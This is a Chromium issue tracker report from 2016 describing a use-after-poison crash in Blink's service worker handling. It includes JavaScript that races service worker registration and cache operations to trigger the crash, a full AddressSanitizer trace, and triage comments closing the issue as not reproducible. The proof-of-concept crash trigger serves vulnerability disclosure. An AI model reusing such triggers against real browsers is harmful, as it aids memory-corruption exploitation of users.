Issue metadata
Sign in to add a comment
|
Security: Service Worker - Use After Poison in WTF::HashTable
Reported by
loobeny...@gmail.com,
Oct 6 2016
|
||||||||||||||||||||
Issue descriptionVULNERABILITY DETAILS Steps to reproduce: 1. Run server side script UAP_lookup_Repro.js in Node.js (node UAP_lookup_Repro.js ). 2. Enter http://localhost:12345 in Chrome browser ASAN build. 3. ASAN reports a Use After Poison in WTF::HashTable. SUMMARY: AddressSanitizer: use-after-poison C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\wtf\HashTable.h:679 in WTF::HashTable<const blink::LayoutObject *,WTF::KeyValuePair<const blink::LayoutObject *,std::unique_ptr<blink::ObjectPaintProperties,std::default_delete<blink::ObjectPaintProperties> > >,WTF::KeyValuePairKeyExtractor,WTF::PtrHash<const blink::LayoutObject>,WTF::HashMapValueTraits<WTF::HashTraits<const blink::LayoutObject *>,WTF::HashTraits<std::unique_ptr<blink::ObjectPaintProperties,std::default_delete<blink::ObjectPaintProperties> > > >,WTF::HashTraits<const blink::LayoutObject *>,WTF::PartitionAllocator>::lookup<WTF::IdentityHashTranslator<WTF::PtrHash<const blink::LayoutObject> >,const blink::LayoutObject *> VERSION Chrome Version: Chromium 55.0.2877.0 (Developer Build) (32-bit) ( https://www.googleapis.com/download/storage/v1/b/chromium-browser-asan/o/win32-release%2Fasan-coverage-win32-release-422171.zip?generation=1475283769780000&alt=media ) Operating System: Windows 10 REPRODUCTION CASE (full server code in UAP_lookup_Repro.js) var MainPageCode = '<html><script>var svcWorkerReg0,svcWorker0;var svcWorkerReg1,svcWorker1; \n'; MainPageCode += 'navigator.serviceWorker.register("/svcworker0.js", {scope: "/"}).then(function(registration) {svcWorkerReg0 = registration; if(registration.installing) {svcWorker0 = registration.installing;}else if(registration.waiting){svcWorker0 = registration.waiting;}else if (registration.active){svcWorker0= registration.active;}\n'; MainPageCode += 'svcWorkerReg0.onupdatefound = function listener7(event) { if(svcWorkerReg1!=undefined) svcWorkerReg1.update();}\n'; MainPageCode += ' navigator.serviceWorker.register("/svcworker1.js", {scope: "/"}).then(function(registration) {svcWorkerReg1 = registration; if(registration.installing) {svcWorker1 = registration.installing;}else if(registration.waiting){svcWorker1 = registration.waiting;}else if (registration.active){svcWorker1= registration.active;}\n'; MainPageCode += ' }).catch(function(error) { });}).catch(function(error) { if(svcWorkerReg1!=undefined) svcWorkerReg1.update();});\n'; MainPageCode += ' setTimeout(function(){location.reload()},150);</script></html>\n'; var svcworkercode0 = 'var cache1;var cache2; this.onactivate = function(event) {caches.open("cacheName0").then(function(cache) {cache2=cache;}).catch(function(error) {});}\n'; svcworkercode0 += 'caches.open("cacheName0").then(function(cache) {cache2=cache;}).catch(function(error) {});\n'; svcworkercode0 += 'try{ caches.delete("cacheName2").then(function(e) {}).catch(function(error) {}); }catch(e){}\n'; svcworkercode0 += 'caches.open("cacheName2").then(function(cache) {}).catch(function(error) {\n'; svcworkercode0 += 'skipWaiting().then(function(res) {}).catch(function(error) {});\n'; svcworkercode0 += 'clients.claim().then(function(e) {}).catch(function(error) {});\n'; svcworkercode0 += 'caches.open("cacheName0").then(function(cache) {cache1=cache;}).catch(function(error) {});\n'; svcworkercode0 += 'try{ caches.delete("cacheName0").then(function(e) {}).catch(function(error) {}); }catch(e){}});\n'; var svcworkercode1 = 'caches.has("cacheName0").then(function(e) {skipWaiting().then(function(res) {}).catch(function(error) {}); \n'; svcworkercode1 += ' caches.keys().then(function(e) {}).catch(function(error) {});\n'; svcworkercode1 += 'try{ caches.delete("cacheName2").then(function(e) {}).catch(function(error) {}); }catch(e){}\n'; svcworkercode1 += 'clients.claim().then(function(e) {}).catch(function(error) {});}).catch(function(error) {});\n'; FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION Type of crash: tab Crash State: ================================================================= ==36828==ERROR: AddressSanitizer: use-after-poison on address 0x275b53f4 at pc 0x1a780b78 bp 0x297fd594 sp 0x297fd588 READ of size 4 at 0x275b53f4 thread T2384 ==36828==WARNING: Failed to use and restart external symbolizer! ==36828==*** WARNING: Failed to initialize DbgHelp! *** ==36828==*** Most likely this means that the app is already *** ==36828==*** using DbgHelp, possibly with incompatible flags. *** ==36828==*** Due to technical reasons, symbolization might crash *** ==36828==*** or produce wrong results. *** #0 0x1a780b77 in WTF::HashTable<const blink::LayoutObject *,WTF::KeyValuePair<const blink::LayoutObject *,std::unique_ptr<blink::ObjectPaintProperties,std::default_delete<blink::ObjectPaintProperties> > >,WTF::KeyValuePairKeyExtractor,WTF::PtrHash<const blink::LayoutObject>,WTF::HashMapValueTraits<WTF::HashTraits<const blink::LayoutObject *>,WTF::HashTraits<std::unique_ptr<blink::ObjectPaintProperties,std::default_delete<blink::ObjectPaintProperties> > > >,WTF::HashTraits<const blink::LayoutObject *>,WTF::PartitionAllocator>::lookup<WTF::IdentityHashTranslator<WTF::PtrHash<const blink::LayoutObject> >,const blink::LayoutObject *> C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\wtf\HashTable.h:679 #1 0x1ba592d5 in blink::ServiceWorkerGlobalScopeClient::from C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\serviceworkers\ServiceWorkerGlobalScopeClient.cpp:44 #2 0x1ba59a42 in blink::WaitUntilObserver::decrementPendingActivity C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\serviceworkers\WaitUntilObserver.cpp:158 #3 0x1ba5999c in blink::WaitUntilObserver::didDispatchEvent C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\serviceworkers\WaitUntilObserver.cpp:103 #4 0x1ba321b4 in blink::ServiceWorkerGlobalScope::dispatchExtendableEvent C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\serviceworkers\ServiceWorkerGlobalScope.cpp:197 #5 0x1e35d4a8 in blink::ServiceWorkerGlobalScopeProxy::dispatchInstallEvent C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\web\ServiceWorkerGlobalScopeProxy.cpp:192 #6 0x1c61695a in content::ServiceWorkerContextClient::OnInstallEvent C:\b\c\b\win_asan_release\src\content\renderer\service_worker\service_worker_context_client.cc:794 #7 0x1c616541 in IPC::MessageT<ServiceWorkerMsg_InstallEvent_Meta,std::tuple<int>,void>::Dispatch<content::ServiceWorkerContextClient,content::ServiceWorkerContextClient,void,void (content::ServiceWorkerContextClient::*)(int) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120 #8 0x1c612a1a in content::ServiceWorkerContextClient::OnMessageReceived C:\b\c\b\win_asan_release\src\content\renderer\service_worker\service_worker_context_client.cc:256 #9 0x1c5d4086 in IPC::MessageT<EmbeddedWorkerContextMsg_MessageToWorker_Meta,std::tuple<int,int,IPC::Message>,void>::Dispatch<content::ServiceWorkerContextClient,content::ServiceWorkerContextMessageFilter,void,void (content::ServiceWorkerContextClient::*)(int, int, const IPC::Message &) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120 #10 0x1c5d3cab in content::ServiceWorkerContextMessageFilter::OnFilteredMessageReceived C:\b\c\b\win_asan_release\src\content\renderer\service_worker\service_worker_context_message_filter.cc:36 #11 0x1873eee1 in content::WorkerThreadMessageFilter::OnMessageReceived C:\b\c\b\win_asan_release\src\content\child\worker_thread_message_filter.cc:44 #12 0x105aecfe in base::internal::Invoker<base::internal::BindState<base::internal::IgnoreResultHelper<bool (content::UtilityProcessHostClient::*)(const IPC::Message &) __attribute__((thiscall))>,scoped_refptr<content::UtilityProcessHostClient>,IPC::Message>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:340 #13 0x14e629a6 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #14 0x18a28c1c in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:344 #15 0x18a24b0b in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:240 #16 0x18a2c6ae in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332 #17 0x14e629a6 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #18 0x14cc0a17 in base::MessageLoop::RunTask C:\b\c\b\Win_ASan_Release\src\base\message_loop\message_loop.cc:405 #19 0x14cc237c in base::MessageLoop::DoWork C:\b\c\b\Win_ASan_Release\src\base\message_loop\message_loop.cc:511 #20 0x14e6bcb4 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:35 #21 0x14cbfed1 in base::MessageLoop::RunHandler C:\b\c\b\Win_ASan_Release\src\base\message_loop\message_loop.cc:370 #22 0x14d49d7e in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35 #23 0x14d490ea in base::Thread::Run C:\b\c\b\win_asan_release\src\base\threading\thread.cc:245 #24 0x14d494a9 in base::Thread::ThreadMain C:\b\c\b\win_asan_release\src\base\threading\thread.cc:333 #25 0x14c37616 in base::`anonymous namespace'::ThreadFunc C:\b\c\b\win_asan_release\src\base\threading\platform_thread_win.cc:84 #26 0x24bb0cd in __asan::AsanThread::ThreadStart e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_thread.cc:250 #27 0x24b656d in asan_thread_start e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_win.cc:113 #28 0x75aa62c3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\System32\KERNEL32.DLL+0x162c3) #29 0x77dd0608 in RtlSubscribeWnfStateChangeNotification+0x438 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x60608) #30 0x77dd05d3 in RtlSubscribeWnfStateChangeNotification+0x403 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x605d3) Address 0x275b53f4 is a wild pointer. SUMMARY: AddressSanitizer: use-after-poison C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\wtf\HashTable.h:679 in WTF::HashTable<const blink::LayoutObject *,WTF::KeyValuePair<const blink::LayoutObject *,std::unique_ptr<blink::ObjectPaintProperties,std::default_delete<blink::ObjectPaintProperties> > >,WTF::KeyValuePairKeyExtractor,WTF::PtrHash<const blink::LayoutObject>,WTF::HashMapValueTraits<WTF::HashTraits<const blink::LayoutObject *>,WTF::HashTraits<std::unique_ptr<blink::ObjectPaintProperties,std::default_delete<blink::ObjectPaintProperties> > > >,WTF::HashTraits<const blink::LayoutObject *>,WTF::PartitionAllocator>::lookup<WTF::IdentityHashTranslator<WTF::PtrHash<const blink::LayoutObject> >,const blink::LayoutObject *> Shadow bytes around the buggy address: 0x34eb6a20: 04 00 00 00 00 04 00 00 00 00 04 00 00 00 00 04 0x34eb6a30: 00 00 00 00 04 00 00 00 00 04 00 00 00 00 04 00 0x34eb6a40: 00 00 00 04 00 00 00 00 04 00 00 00 00 04 00 00 0x34eb6a50: 00 00 00 04 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 0x34eb6a60: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 =>0x34eb6a70: f7 f7 f7 f7 f7 f7 00 00 00 00 00 00 00 04[f7]f7 0x34eb6a80: f7 f7 f7 00 00 00 00 00 00 00 04 00 00 00 00 00 0x34eb6a90: 04 00 00 00 00 04 00 00 00 00 00 00 04 00 00 00 0x34eb6aa0: 00 04 00 00 00 00 00 00 04 00 00 00 00 00 00 00 0x34eb6ab0: 04 00 00 00 00 04 00 00 00 00 00 00 00 04 00 00 0x34eb6ac0: 00 00 00 00 04 00 00 00 00 00 04 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Thread T2384 created by T0 here: #0 0x24b6602 in __asan_wrap_CreateThread e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_win.cc:123 #1 0x14c36e8c in base::PlatformThread::CreateWithPriority C:\b\c\b\win_asan_release\src\base\threading\platform_thread_win.cc:193 #2 0x14d48215 in base::Thread::StartWithOptions C:\b\c\b\win_asan_release\src\base\threading\thread.cc:112 #3 0x18854659 in blink::scheduler::WebThreadImplForWorkerScheduler::WebThreadImplForWorkerScheduler C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\child\webthread_impl_for_worker_scheduler.cc:31 #4 0x188543d8 in blink::scheduler::WebThreadImplForWorkerScheduler::WebThreadImplForWorkerScheduler C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\child\webthread_impl_for_worker_scheduler.cc:25 #5 0x1866260c in content::BlinkPlatformImpl::createThread C:\b\c\b\win_asan_release\src\content\child\blink_platform_impl.cc:448 #6 0x1e1184cd in blink::WebThreadSupportingGC::WebThreadSupportingGC C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\WebThreadSupportingGC.cpp:37 #7 0x1e118379 in blink::WebThreadSupportingGC::create C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\WebThreadSupportingGC.cpp:17 #8 0x1aebb8b1 in blink::WorkerBackingThread::WorkerBackingThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\WorkerBackingThread.cpp:51 #9 0x1e7942a4 in blink::ServiceWorkerThread::ServiceWorkerThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\serviceworkers\ServiceWorkerThread.cpp:48 #10 0x1e794072 in blink::ServiceWorkerThread::create C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\serviceworkers\ServiceWorkerThread.cpp:43 #11 0x1e34730e in blink::WebEmbeddedWorkerImpl::startWorkerThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\web\WebEmbeddedWorkerImpl.cpp:447 #12 0x1c5853cb in content::EmbeddedWorkerDispatcher::OnResumeAfterDownload C:\b\c\b\win_asan_release\src\content\renderer\service_worker\embedded_worker_dispatcher.cc:106 #13 0x1c584f93 in IPC::MessageT<EmbeddedWorkerMsg_ResumeAfterDownload_Meta,std::tuple<int>,void>::Dispatch<content::EmbeddedWorkerDispatcher,content::EmbeddedWorkerDispatcher,void,void (content::EmbeddedWorkerDispatcher::*)(int) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120 #14 0x1c583609 in content::EmbeddedWorkerDispatcher::OnMessageReceived C:\b\c\b\win_asan_release\src\content\renderer\service_worker\embedded_worker_dispatcher.cc:48 #15 0x1c34194b in content::RenderThreadImpl::OnControlMessageReceived C:\b\c\b\win_asan_release\src\content\renderer\render_thread_impl.cc:1717 #16 0x18670624 in content::ChildThreadImpl::OnMessageReceived C:\b\c\b\win_asan_release\src\content\child\child_thread_impl.cc:794 #17 0x14ef1827 in IPC::ChannelProxy::Context::OnDispatchMessage C:\b\c\b\win_asan_release\src\ipc\ipc_channel_proxy.cc:339 #18 0x105aecfe in base::internal::Invoker<base::internal::BindState<base::internal::IgnoreResultHelper<bool (content::UtilityProcessHostClient::*)(const IPC::Message &) __attribute__((thiscall))>,scoped_refptr<content::UtilityProcessHostClient>,IPC::Message>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:340 #19 0x14e629a6 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #20 0x18a28c1c in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:344 #21 0x18a24b0b in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:240 #22 0x18a2c6ae in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332 #23 0x14e629a6 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #24 0x14cc0a17 in base::MessageLoop::RunTask C:\b\c\b\Win_ASan_Release\src\base\message_loop\message_loop.cc:405 #25 0x14cc237c in base::MessageLoop::DoWork C:\b\c\b\Win_ASan_Release\src\base\message_loop\message_loop.cc:511 #26 0x14e6bcb4 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:35 #27 0x14cbfed1 in base::MessageLoop::RunHandler C:\b\c\b\Win_ASan_Release\src\base\message_loop\message_loop.cc:370 #28 0x14d49d7e in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35 #29 0x1c2e5bcf in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198 #30 0x14b357e3 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:418 #31 0x14b37065 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:786 #32 0x14b35334 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20 #33 0xf2f11b8 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97 #34 0x13ea895 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174 #35 0x13e1b0c in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:245 #36 0x24c7332 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253 #37 0x75aa62c3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\System32\KERNEL32.DLL+0x162c3) #38 0x77dd0608 in RtlSubscribeWnfStateChangeNotification+0x438 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x60608) #39 0x77dd05d3 in RtlSubscribeWnfStateChangeNotification+0x403 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x605d3) ==36828==ABORTING
,
Oct 6 2016
NM, I can't read, you said it was 55.0.2877.0, can you confirm with .2883 ?
,
Oct 14 2016
I cannot reproduce it as well. Closing the issue due to a lack of response from the reporter. Please feel free to re-open if you have an additional information.
,
Jan 21 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||
Comment 1 by tsepez@chromium.org
, Oct 6 2016